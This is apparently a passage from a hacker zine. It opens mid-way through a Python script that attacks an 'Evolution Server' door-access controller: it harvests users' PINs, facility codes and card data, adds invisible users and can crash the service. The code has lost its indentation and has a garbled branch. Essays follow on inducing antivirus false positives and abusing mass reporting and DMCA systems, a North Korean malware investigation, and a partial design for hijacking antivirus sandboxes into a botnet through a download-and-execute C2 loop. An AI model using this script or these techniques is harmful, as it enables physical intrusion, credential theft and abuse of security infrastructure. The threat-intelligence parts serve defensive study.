while True: # Loop for current_index1
last_response1 = None
same_response_count1 = 0
while True: # Nested loop for current_index2
data = f'{current_index2}\r\n{current_index1}\r\n'
headers['Content-Length'] = str(len(data))
print(f'Enumerating users; page {current_index2}/{current_index1}',end='\r')
with requests.Session() as session:
response = session.get(url, headers=headers, data=data.encode())
# Check if this response (for index2) is the same as the last
if response.text == last_response1:
same_response_count1 += 1
else:
same_response_count1 = 0 # Reset the count
last_response1 = response.text # Update the last response for index2
lines = [line.replace('\r', '').strip() for line in response.text.split('\n')[3:]]
for i in range(0, len(lines) - 2, 3): # ensure there's always a set of three
user_name, user_color, user_index = lines[i], lines[i+1], lines[i+2]
# Hiding instances where names are missing and user color is red
if user_name and not (not user_name and user_color == "red"):
if int(user_index) > 0 and user_index not in collected_users:
collected_users[user_index] = (user_name, user_color, user_index)
current_index2 += 1
if same_response_count1 >= max_same_responses:
break # Break the inner loop when reached max same responses for index2
# Reset current_index2 and counters after exiting inner loop
current_index2 = 1
current_index1 += 1
if current_index1 > max_same_responses: # Ensure we don't go infinite
break
def fetch_data(endpoint, user_index):
url = f'http://{host}:{port}{endpoint}'
data = f'1\r\n{user_index}\r\nget_code\r\n'
headers.update({'Content-Length': str(len(data))})
with requests.Session() as session:
response = session.post(url, headers=headers, data=data.encode())
return response.text
def extract_data(response, regex):
match = re.search(regex, response)
return match.group(1) if match else ""
def fetch_key_data(endpoint, user_index):
url = f'http://{host}:{port}{endpoint}'
data = f'1\r\n{user_index}\r\nget_code\r\n'
headers.update({'Content-Length': str(len(data))})
with requests.Session() as session:
response = session.post(url, headers=headers, data=data.encode())
# Extract the key value
soup = BeautifulSoup(response.text, 'html.parser')
key_element = soup.find('input', {'id': 'key_card_id'})
return key_element['value'] if key_element and key_element.get('value') else '0'
def fetch_abacard_data(endpoint, user_index):
url = f'http://{host}:{port}{endpoint}'
data = f'1\r\n{user_index}\r\nget_code\r\n'
headers.update({'Content-Length': str(len(data))})
with requests.Session() as session:
response = session.post(url, headers=headers, data=data.encode())
# Extract the abacard value
soup = BeautifulSoup(response.text, 'html.parser')
abacard_element = soup.find('input', {'id': 'abacard_card_id'})
return abacard_element['value'] if abacard_element and abacard_element.get('value') else '0'
for user_index in collected_users:
# Get PIN
pin_response = fetch_data("/DESKTOP_EDIT_USER_GET_PIN_FIELDS", user_index)
pin_value = extract_data(pin_response, r'value="(\d+)" name="loc_form_user_pin"')
# Get Card Fields
card_response = fetch_data("/DESKTOP_EDIT_USER_GET_CARD_FIELDS", user_index)
site_code_value = extract_data(card_response,
r'value="(\d+)" SELECTED')
card_data_value = extract_data(card_response,
r'value="(\d+)" name="loc_form_user_card"')
key_value = fetch_key_data("/DESKTOP_EDIT_USER_GET_KEYS_FIELDS",
user_index)
abacard_value = fetch_abacard_data("/DESKTOP_EDIT_USER_GET_ABACARD_FIELDS",
user_index)
collected_users[user_index] += (pin_value, site_code_value, card_data_value,
key_value, abacard_value)
blue_users = []
red_users = []
black_users = []
# Categorize users based on Color
for user_index in collected_users:
user_data = collected_users[user_index]
if user_data[1].lower() == 'blue':
blue_users.append(user_data)
elif user_data[1].lower() == 'red':
red_users.append(user_data)
black_users.append(user_data)
elif user_data[1].lower() == 'black':
def generate_table(users, title):
table = f"{title}\n| User Index | Name | Color | PIN |
table += f"Site Code/Facility Code | Card Data | Silcakey | AbaCard |\n"
table += f"|------------|------|-------|-----|-----------|-----------|-----|--------|\n"
for entry in sorted(users, key=lambda x: int(x[2])):
table += f"| {entry[2]} | {entry[0]} | {entry[1]} | {entry[3]} "
table += f"| {entry[4]} | {entry[5]} | {entry[6]} | {entry[7]} |\n"
return table + "\n"
# Generate tables for each color category
blue_table = generate_table(blue_users, "\n## Users with Access")
red_table = generate_table(red_users, "\n## Users with revoked access")
black_table = generate_table(black_users, "\n## Non-Access Users")
return blue_table + red_table + black_table
def add_user(host, port, card_number, site_id, username, invisible):
url = f'http://{host}:{port}/USER_CHANGE'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
data = {
'user_operator_id': '0' if invisible else '1',
'user_id': '0',
'user_name': username,
'1': 'on',
'loc_form_user_card_imptrinted': card_number,
'loc_form_user_als_sitecode': site_id,
'loc_form_user_als_sitecode_new': site_id,
'loc_form_user_card': card_number,
'loc_form_user_data1': '',
'loc_form_user_data2': '',
'command': ''
}
response = requests.post(url, headers=headers, data=data)
return("Completed adding user")
# Update the main function to test the new function:
def main():
parser = argparse.ArgumentParser(description="Interact with Evolution Server.")
parser.add_argument("--host", help="Target host (IP address)")
parser.add_argument("--port", type=int, help="Target port")
parser.add_argument("--crash", action="store_true", help="Crash the application")
parser.add_argument("--add-user", action="store_true", help="Flag to add a new user")
parser.add_argument("--username", type=str, help="Username for adding user")
parser.add_argument("--site-id", type=str, help="Site ID for adding user")
parser.add_argument("--card-number", type=str, help="Card number for adding user")
parser.add_argument("--invisible", action="store_true", help="Make the user invisible")
args = parser.parse_args()
host = (args.host)
port = (args.port)
if args.add_user:
if not all([args.card_number, args.site_id, args.username]):
print("Error: When adding a user, --card-number, --site-id, and --username are required.")
exit(1)
print(add_user(host, port, args.card_number, args.site_id, args.username, args.invisible))
if args.crash:
print(application_crash(host, port))
if not(args.crash):
print(retrieve_site_name(host, port))
print(get_operator_names(host, port))
print(retrieve_company_fields(host, port))
print(return_last_scanned_card(host, port))
print(get_users(host, port))
#print(request_all_users(host, port))
#print(request_all_doors(host, port))
if __name__ == '__main__':
main()
|=-----------------------------------------------------------------------=|
|=-=[ 3 - The Weaponization of Automation ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
by Xenon Hexafluoride
These days when folks hear automation they think AI. All the discussion these
days is around “How I tricked an AI bot into selling me a car for a dollar”,
and “I got DALL-E to spit out goatee when they tried to train it on my
artwork”. These are fun and righteous hacks. But the reality is that a lot
of the dangerous and unethical shit predates AI. Automation has existed long
before AI. It was ML, expert systems, runbooks, mechanical turks, etc. long
before all the buzzwords kicked in. And, when a system exists long enough,
folks other than curious hackers will start attacking it to hurt others,
make money, or both.
I’m not going to dig into the minutiae of AI poisoning, because as you dear
readers well know, the old attacks still work. We’re going to get into how
groups today are still leveraging attacks on pre-existing automation and how
reliance on AI will just make the problem worse.
Swatting
It seems appropriate to start with the confluence of old school phreaking,
law enforcement basically being mechanical turks, and bigoted assholes on
the internet.
Swatting has been around a long time, starting with random folks that tea-
bagged the wrong person in Halo or Brian Krebs. And once we’re done laughing
about Krebs, no friend to hackers, having his house surrounded by gunmen,
remember that at least one of them was hell bent on killing any dog they
saw. But how could such a bastion of the law and computer ethics be subject
to such indignity?
He tried to avoid this. The local PD listened to his concerns, wrote down
that if they get a panicked call from his house that sets off the SWAT
response runbook, they should call back first to double check.
Best they could do was call twice while he was running a vacuum and not use
common sense before the runbook kicked off. So he had multiple guns pointed
at him. There wasn’t a page in the runbook for actually responding to a
likely hoax, so they had to respond not knowing that. The icing on the cake
is that the runbook breaks down again on actually detaining someone, so you
get officers giving conflicting orders. He’s lucky to be alive, and no one
from the police would have gotten in trouble if he wasn’t.
More recent incidents involving politicians and judges all are ending in
local LE actually updating their runbooks for folks under federal
protection. Not so much for the rest of us. There are starting to be more
fatalities without law enforcement themselves taking responsibility (as
always deflecting to anyone but themselves for blame). And as law
enforcement embraces AI as a way to launder their own biases, bigotry and
hatred of due process, we’re heading for a future where instead of TSA
giving you a hard time because a computer said so, a bunch of armed men
looking for a fight will show up to your house because a computer told them
to.
AV and other Signature/AI Based Detection
Systems that automatically detect “malicious” behavior and block it are
inherently weaponizable. They typically run with a high degree of privilege
or on the critical path and are often deployed to block first and figure out
what happened later. Even in the cases where they run out of band, they can
randomize the security team and provide a smokescreen for real attacks by
either forcing an expensive response process or exhausting resources.
Most of these attacks will start from convincing the security software to
have a false positive detection on something. In some cases this is as
simple as submitting a sample with the desired characteristics or behaviors
via an anonymous channel, but if you convince someone in security or IT to
send it into their vendor support rep you can bypass a lot of internal
safeguards against these attacks. Another way to get around safeguards at a
target vendor is to leverage the fact many of these companies are graded
against each other and therefore are forced by sales and marketing to give
far more credence to competitor detections. Virus Total and many IP/URL
rep services are great places to start. For network traffic, the ET Open
signature set, especially with a lot of “malicious” pcaps posted will likely
end up absorbed into other vendor detection sets before the FPs are known.
And some of the anti-spam providers operate on a hair trigger without too
much work.
A few more concrete examples: For URL reputation, it is often just
anonymous reporting or IT reporting of the URLs, as mentioned above, to low
hanging fruit public databases that do minimal verification. After a few of
those submissions, attackers can start working up the provider reputation
ladder with reports. For low prevalence files like an unsigned line of
business application or a small competitor, the more common attack is
submitting variants of known malicious droppers updated to also drop a copy
of the target program to VirusTotal. At this point the attacker is just
waiting for enough vendors to detect the sample so that “me too” signing is
triggered by aforementioned sales and marketing requirements. In other cases
attacks might require blending features of known malware or malicious
traffic with the features of what you want to induce an FP on (e.g. C2
traffic with similar characteristics to Epic Medical Software, emails with
clear phishing links that are otherwise identical to a security alert an
attacker wants to hide, or resigning a file with a suspicious code sign
cert.)
While many of these techniques are frequently used to blend into the
background, using the vendor fear of FP to avoid detection, causing the FP
can also be the objective. Which FP or FPs are induced in the target
software/ecosystem and how the samples are initially fed into the automation
pipeline will depend on ultimate goal and underlying systems actually being
attacked. The attacks can be pure denial of service (e.g. taking down a
bank’s in house ACH software), repetitional attacks on a security vendor to
reduce trust (either for a future attack on someone using their software or
a competitor), repetitional attacks against competitors using security
vendors as weapons directly, or even as a resource exhaustion attack on the
security team at a target.
Although some of these, like intentional denial of service on critical
systems remain theoretical, I’ve seen, often firsthand, the use of the
simple report and wait URL and file reputation attacks between competing
companies. And then there was the one time a grumpy Russian oligarch
decided his AV competitors were “stealing” from him. Even though he helped
create the entire ecosystem of sales and marketing driven AV testing that
made “me too” detections table stakes.
The Kaspersky attacks used knowledge of how AV engines internally break
files into features to inject features common across a variety of malicious
samples, leaving the automation only the clean snippets to differentiate
from other generic detections. If this sounds a lot like an AI poisoning
attack before it’s time, that’s because at its core that’s what it is.
Around the same time hackers were just throwing the first 256 bytes into
the .rsrc sections of PE files for the lulz; a much less sophisticated attack.
In the end Kaspersky did themselves more harm than good by getting caught. [3]
And yet all the involved companies agreed to just blame hackers. [4]
Automated Copyright Enforcement Moving on to content creation, we hit the
nexus of corporate profits for the company responsible for in theory being a
“good faith” broker and corporations that want to loot as much money as they
can. Compared to other attacks in this article, this one is straightforward
because it relies on companies maximizing profit and the gift that keeps on
giving headaches to hackers, creators, and basically anyone that isn’t a
corporate lawyer, the DMCA.
Youtube’s ContentID and other platforms with automated enforcement built in
have long had issues with fair use [5] but generally fair use is infrequent
enough that when it’s flagged by a platform or a notorious copyright troll
with automation like Sony BMG, the dispute process can keep up. It still
sucks, but most of the content hosts are reasonable about fair use because
it started impacting their own bottom line (loss of content elsewhere and
legal fees if the fair use was also a deep pocketed corporation). It still
sucks, but it won’t get better until the laws or financial incentives
change.
The more recent DMCA abuse involves leveraging these same automated systems
to steal credit from artists and other creators. The attack is making just
enough original music to be considered slightly legit by a troll company
like Sony BMG or “The Orchard”, then claiming music that is not claimed
yet. In some cases, this is just to use ContentID etc. to get ad revenue
from an artist that isn’t trying to monetize their work. Generally, the
artist's apathy means they don’t notice someone has claimed their work…
That is until they tell other creators that like it’s totally cool to use
their music for free and it ends up in monetized videos from creators that
do care about their revenue. The attacker and their corporate facilitators
then mass report the videos with the newly claimed music and cash in while
the dispute process takes place.
The reasons these work so well are two-fold. There is no good way to
register public domain music/content, and definitely no incentive for either
the trolls or platforms to do it. The second is the DMCA flagging/reporting
process is easy and allows for mass reporting, but as mentioned above, really
difficult to resolve and usually cannot automatically resolve unless the
original rights holder (not the impacted creators) sues the troll directly.
So 30 minutes per video sucks for fair use, but 30 minutes for a catalog of
hundreds of videos is a nightmare and difficult to dig out from. And since
the original rights holder still can’t really claim the work, a different
attacker and helpful troll company are free to do it again in the future.
There is also a new variation on this attack just starting up where AI is
used to rip off someone else’s content, then the folks doing bulk AI
rip-offs use DMCA and the backing automation to claim copyright infringement
against the original.
From content moderation of generalized online assholes on both sides of the
political spectrum (or neither) to more organized and targeted groups like
Kiwifarms, automated content moderation has been abused to de-platform or
demonetize targets for nearly as long as it has existed. And yet from the
days before 4chan to today, even as the underlying automation has changed,
the same attacks still work. Keyword lists never went away as the first
tier, they just have weights now. The second tier hit by mass reporting is
more likely an LLM instead of someone underpaid in awindowless room with
a binder and poor English skills (i.e. mechanical turks). And at the top tier
is a human that can at least think as much as the lawyers allow, if you
somehow actually manage to escalate to them.
The same attacks still work because of both inherent issues with the system
design of how automation is used, and a high disparity between attacker and
victim. The usual attack will either mine historical posts of a target user
or start a harassment campaign against them. Once they find or elicit a
response that they know will get sufficiently flagged by one of the first two
tiers of automation, they and their friends all mass report the target. Some
of the responses that will generally meet this criteria are typically
responding to dog whistles with actual slurs, non-serious threats of
violence or self harm, or far too often, just reposting harassing messages
that should trigger the automation, but ether come from a wave of disposable
accounts or only do so when mass reported.
The companies either can’t or won’t pay for improved human mitigation for
these attacks, either for financial reasons, or a fundamental naive belief
that bad faith behavior is either not their problem or something automation
can handle. Add in the additional disparity/asymmetry problems of an
individual against a group, standards around acceptable speech generally
disfavoring minority groups, and the consequences for some being a loss of
support or income for the target. Attackers can make dummy accounts for
actionable harassment while sticking to dog whistles on their primary
accounts, while targets frequently rely on just one account.
More unsettling is some of the context coming out of an attack that normally
would only be in the realm of the US Military: deploying $44 billion to
destroy something. Elon’s takeover of Twitter has shown what bad faith
content moderation looks like when the government isn’t already running a
censorship regime (e.g. TikTok). It raises questions about some of
the decisions at other big corporations, especially Facebook. In the days
of 4chan, it was just folks on the internet who, in hacker fashion, figured
out the systems better than the folks that wrote or maintained them. But
since then, Google had a bunch of pro-James Damore employees dox his
internal critics publicly. To what extent they and folks like them are
sharing details of moderation systems or actively sabotaging them to
facilitate harassment we can’t be sure.
The actual danger of AI isn’t necessarily the technology itself, but how it
is used. It doesn’t mitigate the old attacks using automation, it amplifies
them. In some cases, it’s adding a level of certainty to automation systems
by virtue of being harder to understand, not actually earning that trust in
many of the fields it’s being deployed. That same complexity also makes
both external poisoning attacks, but also intentional incorporation of bias
harder to detect and mitigate. Finally, by being so obtuse yet so
unreasonably trusted, it further removes responsibility from people
knowingly operating insecure systems so they can blame everyone but
themselves: the AI, the targets, and whenever they can find an excuse,
hackers.
[1] — https://arstechnica.com/information-technology/2013/03/security-
reporter-tells-ars-about-hacked-911-call-that-sent-swat-team-to-his-house/
[2] — https://www.justice.gov/usao-ks/pr/ohio-gamer-pleads-guilty-swatting-
caused-death
[3] — https://www.reuters.com/article/2015/08/14/us-kaspersky-rivals-
idUSKCN0QJ1CR20150814/
[4] — Propellerheads - History Repeating.
[5] — https://www.eff.org/deeplinks/2016/05/dear-sony-not-fee-use-fair-use
|=-----------------------------------------------------------------------=|
|=-=[ 4 - Riding with the Chollimas: Our 100 day quest to ]=---------=|
|=-=[ profile a North Korean State-Sponsored Threat Actor ]=---------=|
|=-----------------------------------------------------------------------=|
by MauroEldritch <Quetzal Team>
[Table of contents]
0) About: Eldritchs, Quetzals, Chollimas
1) Introduction: A warm February morning in Uruguay
2) The infection
3) A Digital Molotov: Analyzing a homemade malware
4) IOCs, CTI, Snitches & Stitches
5) Winged horses, corpo espionage and ballistic missiles
6) OPSEC Fail
7) Outro: February again
8) Acknowledgments
9) References
--
0) [About: Eldritchs, Quetzals, Chollimas]
About the Author
Mauro Eldritch is an Argentine-Uruguayan hacker, founder of BCA LTD and
DC5411 (Argentina / Uruguay). He spoke at different events including
DEF CON a couple of times in the past. Loves Threat Intelligence and
Biohacking, and is part of the Quetzal Team.
About the Quetzal Team
Quetzal is Bitso's Web3 Threat Research Team. Our focus and commitment
are to deliver high-quality threat intelligence reports on advanced
persistent threats (APTs) and state-sponsored threats targeting the
crypto space.
In the past, we have successfully confronted organized cybercrime
operations carried out by Fancy Lazarus (RansomDDoS), Lazarus (Labyrinth
& Velvet Chollimas), and EVILNUM (Mercenary Group). Also, Quetzals are
majestic green birds present in Central and North America.
About the Chollimas
A Chollima (or Qianlima or Senrima) is a mythical winged horse present
in Eastern Asian mythology, which inspired important political movements
like the North Korean Chollima Movement.
It is also the alias used by CrowdStrike for North Korean Threat Actors.
These are state-sponsored actors who are backed financially and legally
by their government, allowing them legal impunity and significant
budgets. This ultimately result in reckless attacks against other
governments (Op DarkSeoul), corporations (Sony, Bangladesh Bank), crypto
protocols and bridges (Ronin & Horizon bridges), or just globally (like
the WannaCry outbreak).
Sometimes, these reckless attacks experience "drawbacks" and end up like
a fun story rather than a tragedy. Luckily this is one of those stories.
--
[Introduction: A warm February morning in Uruguay]
Note: All times expressed in GMT (for reference, Uruguay is GMT-3, Mexico
GMT-6). The year is 2023.
February, 7th.
> 12:00.
It was a warm February morning in Uruguay. It was early for me, and even
earlier for the rest of my team who were living three hours behind in
Mexico. The first thing in the morning, an EDR alert hit me, and I stumbled
upon an unusual malware sample that seemed quite homemade.
Surprisingly simple, it evaded all existing antivirus software and was only
detected and blocked by heuristics. Thus, I deemed it worthy of further
investigation. After conducting the usual CTI and OSINT routine, things
took a much darker turn... Almost 100 days later, we decided to team up
with Juan Brodersen, a journalist and my friend.
And so, our journey to profile the malware developers (and their campaign)
began. But let's tell this tale from the start, and go back to that warm
February morning in Uruguay when I met the Chollimas for the first - and
certainly not the last - time.
--
2) [The infection]
February, 7th. That warm morning.
> 12:25.
An unknown malware was detected on an engineer's laptop, bundled inside
a fake Java QR Generator.
> 12:25 - 13:01
The artifact was sandboxed. The affected host was network contained and
multiple alerts from Crowdstrike Falcon were issued.
> 13:01
The artifact was seized after preventing it from self-deleting. We started
monitoring its behavior and extracting IOCs. It looked plain simple, like
those things that cannot fail just due to its simplicity, but I'm not one
to judge a book solely by its cover. And hell, I was right.
--
3) [Digital Molotov: Analyzing a homemade malware]
February, 7th. That warm morning.
> 15:00
"This is a basic - seemingly homemade - RAT that attempts to open a
reverse shell. As of the time of writing, there is no public mention
of this malware or its components. I named it QRLOG."
- My first report on the sample from now on, QRLog.
QRLog was surprisingly simple, working as an implant inside a functioning
QR Generator project and hiding its malicious payload in plain sight
within a base64 encoded variable named QUIET_ZONE_DATA. This variable
was written to a temporary .java file. Upon execution, it would open a
reverse shell for the adversary to *manually* abuse the system.
And that's it. No fancy UAC bypass, kernel extensions, or 0-days that
didn't make its way to the proper exploit broker were used. Just plain
Java code encoded in base64 against all odds. That simplicity eluded
*all* antivirus detections on VirusTotal, but luckily its behavior was
noisy enough for Falcon's heuristics to raise a brow and a set of alerts
against it.
While reviewing the code, I noticed numerous indications of its homemade
origin. These included various instances of bad practices and
carelessness: unnecessary imports, poorly written functions attempting
to identify the OS, a custom function for generating random strings
despite importing libraries for that purpose, hardcoded paths, and even
a hardcoded Command and Control (C2) server address.
I couldn't believe that such a simple piece of code could bypass antivirus
with just mud and sticks. So, I asked Maximiliano Firtman, a Java expert,
programmer, and professor, what he thought of the code. He shared:
"It is the code of someone who does not have much experience and was
copying and pasting things from the Internet. It appears as though
someone created a script for hacking their girlfriend."
This led us to compare QRLog to a "digital molotov": simple, but
destructive.
February, 9th. 2 warm mornings later.
> 12:07
QRLog was my very first malware analysis, so I thought it was a good
warm-up for what could - eventually - come next in my career: an easy
start. I wrapped up everything I found and published the IOCs as an
intelligence pulse in AlienVault OTX, along with a write-up about the
analysis on my Github profile.
Just like the code itself, the indicators didn't quite catch the eye:
SSL certificates issued by Let's Encrypt, some cheap VPS instances, and
the aforementioned C2 server, which seemed to be recycled.
The C2 was associated with almost 500 other domains and had a rather
tarnished reputation on different intel platforms, as it took
part in many malicious campaigns in the past. These include Log4J,
JokerSpy, hosting Cobalt Strike, among others.
There wasn't much more to tell. The CTI session came to an end, and
I wanted to focus on other matters... But it didn't last long.
--
4) [IOCs, CTI, Snitches & Stitches]
April, 26th. 79 mornings later. Some warm, some not so much.
> 08:44
I received a DM on Twitter regarding my publication on Github: A friendly
researcher wanted to contact me on a secure platform to share something
important about one of my IOCs. We went over Tox, where he told me:
"Just out of curiosity, were you aware that what you were looking at
was malware from a North Korean threat actor?"
I was frozen in place. After discussing the matter for a bit, and with
his permission, we moved on to share this intel with Crowdstrike to
confirm attribution. We also shared information with my journalist
friend Juan to collaborate on this story. Revisiting my notes once again,
I noticed their C2 was still up and running... so I thought, "why not?"
> 09:30
After reviewing QRLog's interaction with its C2 server, we found a way to
submit a crafted message which will surely be read by the TAs. With
journalistic purposes, we started flooding their server with an invite
to talk on Telegram, sharing my alias in hopes to get "the interview".
But I think people send friendship requests in a different way in
North Korea...
> 10:28
We observed hundreds - which then became more than a thousand - attempts to
brute-force an SSH instance running on the machine from where the original
contact request was sent. Unbeknownst to the TAs, that VPS served
involuntarily as a honeypot, and provided us with even more valuable
intel on their infra. These attacks went on for days, but since we were
collecting their data, the longer we endured, the better. After all...
snitches get stitches.
April, 28th. 81 mornings later. On a particularly rainy one.
> 13:36
Crowdstrike wrote back, confirming attribution with High confidence to
Labyrinth Chollima, a division from the infamous Lazarus group, and part
of the DPRK RGB (Reconnaissance General Bureau).
May, 2nd. 85 mornings later. On a particularly chilly one.
> 16:10
The C2 server went down for good. The attacks stopped. More than 1500 brute
force attempts were received from all around the world. Many IPs belonged
to lesser known VPS providers, while others belonged to big players like
AWS.
Onboarding Juan was a good decision, as he managed to get a word with
AWS CISO, Mark Ryland. He expressed his concern that while "hackers are
willing to pay for [our service]", "there are more sophisticated actors
that abuse AWS".
From my side, I began classifying and packaging all the new intel to
publish it as a pulse once again on AlienVault OTX. It was at that point
where we wanted to know everything about them. But as they say, curiosity
killed the cat.
--
5) [Winged horses, corpo espionage and ballistic missiles]
May, 10. 93 mornings later. On a depressingly frosty day.
> Around 13:00
Juan began communicating with PR departments at different security firms
about what they knew. None of them had seen the sample before, and we
were the very first to publish anything about it, and its surrounding
espionage campaign.
Slowly, we pieced together the puzzle of the North Korean threat landscape,
connecting names and heists, learning about the separation between "common"
divisions within Lazarus, like Labyrinth Chollima, Stardust Chollima, and
Silent Chollima, which carried out espionage and crypto theft operations
targeting giants like Sony or AstraZeneca.
We also learned about "more sophisticated" or even (as some vendors call
them) "elite" divisions like Velvet and Ricochet Chollima, responsible
for targeting the Korean Hydro Nuclear Power Plant in 2014 and the Daily
NK, one of Korea's largest media outlets, in 2023.
All of these divisions seemingly had a common objective: to conduct
economic espionage and theft for their state. Ultimately, these funds
were put to an even darker fate: to fund North Korea's ballistic program.
"[...] stolen assets are likely funding an array of state projects
including North Korea's nuclear and WMD programs."
- Crowdstrike Intelligence report on Labyrinth Chollima. 2023.
"Cyberwarfare is an all-purpose sword that guarantees the North Korean
People's Armed Forces ruthless striking capabilities, along with nuclear
weapons and missiles"
- Kim Jong-un. 2013. This speech was quoted by HC3 & CISA.
"Treasury is taking action against North Korean hacking groups that have
been perpetrating cyber attacks to support illicit weapon and missile
programs"
- Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial
Intelligence. 2019.
With their campaign discovered, their C2 flooded, and their sample
captured, it seems they decided to call it a day and let us be. But
remember, the devil is in the details, and they let slip an important one.
--
6) [OPSEC Fail]
May 16. 99 mornings later. Missing those warm days.
> 15:00
I was reviewing my notes again while working on slides about this story,
and came across a funny OPSEC fail. During the analysis, I found a file
shipped alongside the sample called inputFiles.lst, which contained
Maven build information. Reading it, we found some interesting debug
messages:
"[...]/default-compile/inputFiles.lst:275 C:\Users\Edward\Downloads\qr-code[...]"
So, our friend was named (or at least went by) Edward and was a happy
Microsoft Windows user... what a western spy move, if you ask me. Anyway,
this story was over, and the best CTI session of my life came to an end.
Or did it?
--
7) [Outro: February again]
February, 8th. 366 mornings later. Thinking about the upcoming weekend.
> 22:00
An unknown malware was detected on an engineer's laptop, bundled inside
a fake Slack to CSV exporter.
--
8) [Acknowledgments]
Bitso Information Security & Quetzal Teams.
Rob Harrop.
Juan Brodersen.
--
9) [References]
This story was published in various formats: intelligence pulses, talks,
articles, and newspapers. You can find links to all of them below.
- DEF CON 31 Video
https://www.youtube.com/watch?v=DB6yDJeb6U8
- DEF CON 31 Slides
https://docs.google.com/presentation/d/1mQuauuJCdDI9d_HfIvLdtk_vM4FU4v0AUmlTShV9_hI
- QRLog Technical Analysis
https://github.com/birminghamcyberarms/QRLog
- QRLog Intelligence Pulse
https://otx.alienvault.com/pulse/64cfcc366fc8f13ce315f39a
- Labyrinth Chollima Infrastructure Pulse
https://otx.alienvault.com/pulse/64cfcc366fc8f13ce315f39a
- Diario Clarín (Spanish)
https://www.clarin.com/tecnologia/hecho-corea-norte-descubren-nuevo-virus-funciona-molotov-digital_0_fR36LRX5mj.html
- The Hacker News
https://thehackernews.com/2023/08/north-korean-hackers-deploy-new.html
- SentinelOne
https://www.sentinelone.com/blog/jokerspy-unknown-adversary-targeting-organizations-with-multi-stage-macos-malware/
- SC Magazine
https://www.scmagazine.com/news/vmconnect-campaign-linked-to-north-korean-lazarus-group
|=-----------------------------------------------------------------------=|
|=-=[ 5 - Master of Puppets - turning AV sandboxes into a botnet ]=------=|
|=-----------------------------------------------------------------------=|
by Grzegorz Tworek
As malware becomes more and more sophisticated, defenders realize that
typical static analysis is slowly losing its value as the main method of
knowing what happens in the infected system. At the same time virtual
machines are cheaper, more reliable, easier to orchestrate and automate and
just more friendly. Instead of hiring highly qualified reverse engineers,
malware analysts can run thousands of machines and observe how they behave
after being intentionally infected. Once again blunt force tries to replace
our skills, but in some cases, it seems to make sense.
I have tried to play with such dumb devices multiple times in the past,
including circular references in vbaProject.bin filesystems, fork bombs etc.
It was not very sophisticated but sometimes even the timeout may give you
some satisfaction, not to mention a bit of knowledge about how the stuff
works inside. Of course, I have tried with EXE files, especially as I have
realized that a huge number of sandboxes are easily reaching the Internet.
No need to smuggle bits in NTP or DNS queries, when you simply make a HTTP
request and observe it on your web server milliseconds later. Of course, my
real goal is not to make an analysis itself, but to keep my code running
forever. This may be achieved with a trick if your analyzed EXE downloads
and runs another EXE. Which gets launched (a.k.a. detonated), downloads yet
another EXE, again running and downloading, but I suppose you get the point
already.
The unsurprising problem I have observed is related to obvious sandbox
optimization: they get bored. If I drop a file which is already known, no
one wants to waste time on it anymore, which requires a small challenge when
it comes to automation of the entire process. Theoretically EXE files are
relatively easy to modify in their binary form, as some sections (e.g.
.rdata, .data, or .rsrc) may be carefully overwritten without affecting how
the program works. Additionally, the PE file format allows appending some
bytes at the end of file without changing the application behavior. Such
changes can be automated, leading to a solution that serves a different file
each time someone requests it. Of course, files (and file hashes) will be
different each time, but it may not be enough to keep sandboxes attention.
Even if the file itself differs, a sandbox can quickly realize the new EXE
is doing basically the same thing as the one already known, using a sequence
of functions imported from system DLLs. You can observe it e.g. with
dumpbin.exe tool from Microsoft by issuing "dumpbin.exe /imports
filename.exe" command. Antivirus solutions calculate the "IMPHASH" [1] using
this data and can spot that different files are not that different at all
and get bored, dropping any further analysis and code execution.
Theoretically, some advanced binary manipulations could be possible to make
the EXE file substantially different each time, but I have decided to go
simpler way and compile a new C source code each time someone wants to
download an EXE file. Even if I could dynamically generate new source file
each time, I have simplified my approach with a set of #ifdef, making
different (randomly picked) parts of the source to be included in the build
process. The compiler allowed me to set appropriate #define before I start
the compilation, but when it comes to the randomization of code, it can be
done with pure preprocessor directives as well [2] if anyone prefers it. Of
course, randomized parts cannot change the application behavior and their
execution should not matter. After analyzing different functions to be
randomly imported I found SNMP and Bcrypt DLLs most convenient. Both look
suspicious enough to dig deeper but when called in a right way they do
nothing except returning an error I can safely ignore. For example, the
BCryptSecretAgreement() checks handles first, and I intentionally call it
with NULLs, knowing I will obtain STATUS_INVALID_HANDLE with no side
effects. I am sure a skilled analyst can spot a red herring here, but
sandboxes are fortunately not smart enough.
Of course, I can easily write, test and compile my code with Visual Studio I
normally use, but it would be a huge overkill for this scenario, even if
limited only to command line tools. Finally, I have decided to use Tiny C
Compiler (https://bellard.org/tcc/) which seemed to perfectly fit my needs.
The server part was initially based on a well-known, thirty years old, CGI
interface to the Microsoft Internet Information Server. CGI is relatively
simple to integrate and debug, but at the same time each requests requires
launching new process, which in turns launches a compiler with appropriate
parameters such as source files and #define mentioned above. It works, but
its performance is far from satisfying. On top of the real randomization
provided by #ifdef, the filename requested by the EXE running in the sandbox
was randomized as well. Serving a file with changing name is possible in
couple of ways: by rewriting the request at the server side (too complex),
by using queries in the URL (too suspicious) or by configuring the 404
handler to return a freshly compiled EXE each time someone asks for a random
URL.
Effectively, the flow was:
1. A sandbox "detonates" the EXE file
2. EXE file sends a HTTP request to the web server fitted with CGI
3. The server compiles and serves the randomized EXE back to the sandbox
4. The sandbox saves the obtained file to a disk and launches new process
using it.
And 1-4 repeats. Details of the implementation make parent process at the
sandbox present until the child process terminates, which will never happen
without an external intervention or a failure.
As I have explained above, the following sequence keeps the sandbox busy and
in extreme cases, more than 1000 parent-child process levels could be
observed, which is even more frightening knowing the _wsystem() function
used to launch a child process executes cmd.exe first, then the real process
specified as a function parameter. All these cmd.exe processes remain active
until the launched process terminates.
The source code and the infrastructure serving its compiled version acts
effectively as a server-to-client part of the C2 communication. If I want
controlled sandboxes to do something, I simply need to add couple of lines
to my C source, and new commands will be compiled and downloaded soon.
Experiments shows that it happens literally within seconds after a change in
the source code.
The client-to-server communication is simpler, as HTTP protocol provides
multiple ways of sending data to servers. Out of these methods, only 3 were
used for simplicity and staying under the radar:
1. Hostname - each time resolved to the same IP, but containing 8
characters I could use to get data back
